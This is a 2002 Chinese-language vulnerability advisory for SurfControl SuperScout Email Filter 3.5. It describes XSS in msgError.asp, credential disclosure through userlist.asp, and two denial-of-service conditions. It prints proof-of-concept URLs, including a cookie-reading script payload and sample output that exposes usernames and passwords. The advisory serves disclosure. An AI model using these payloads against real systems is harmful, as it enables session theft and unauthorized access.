SurfControl's SuperScout Email Filter管理服务程序存在4个漏洞发布时间:2002-10-15 更新时间:2002-10-15 严重程度:中 威胁程度:其它 错误类型:设计错误 利用方式:服务器模式 受影响系统 SurfControl SuperScout Email Filter 3.5详细描述 SurfControl存在以上4个漏洞: 1)SurfControl存在跨站脚本可执行攻击: SurfControl产品没有过滤用户输入,管理服务程序中包含msgError.asp的脚本对Reason参数的数据缺少过滤,攻击者提供恶意HTML代码,并使其他用户查看时,导致脚本在目标用户上执行,泄露敏感信息如COOKIE。 2)存在用户名密码泄露问题: 管理服务程序的userlist.asp脚本存在问题,远程攻击者通过直接访问这个脚本,并查看源代码就可以获得管理员用户名和密码信息。 3)Content_length参数缺少可导致拒绝服务。 攻击者如果提交不包含Content_length参数内容的HTTP请求,可导致服务程序崩溃,产生拒绝服务。 4)不完整GET请求可导致拒绝服务。 如果攻击者提交的GET请求如果不包含(\r\n\r\n)结尾,服务程序会一直等待这些结束符。多种这样的连接,可导致WEB服务程序产生拒绝服务。 测试代码 1)http://<IPAddress>/web/msgError.asp?Redirect=login.htm&Reason=Invalid+username+or+password! XSS Example: http://<IPAddress>/web/msgError.asp?Redirect=loginhtm&Reason=<script>alert(document.cookie);</script> 2)http://<IP Address>/web/usermgr/userlist.asp Sample HTML output: <tr BGCOLOR=#EEEEEE><td><a href='actions/edituser.asp?User=ken&Password=ken&Enabled=Enabled&Email=ken@ftusecurity.com' title='Edit user' onMouseOver="window.status='Edit ken';return true;" onMouseOut="window.status=' ';return true;">ken</a></td><td><b>Enabled</b></td></tr><tr BGCOLOR=#DDDDDD><td><a href='actions/edituser.asp?User=test&Password=test&Enabled=Enabled&Email=ken@ftusecurity.com' title='Edit user' onMouseOver="window.status='Edit test';return true;" onMouseOut="window.status=' ';return true;">test</a></td><td><b>Enabled</b></td></tr> 解决方案 联系供应商获得补丁。 相关信息 "'ken'@FTU" <ken@ftusecurity.com>. 参考:http://online.securityfocus.com/archive/1/294571 相关主页:http://www.surfcontrol.com/ |
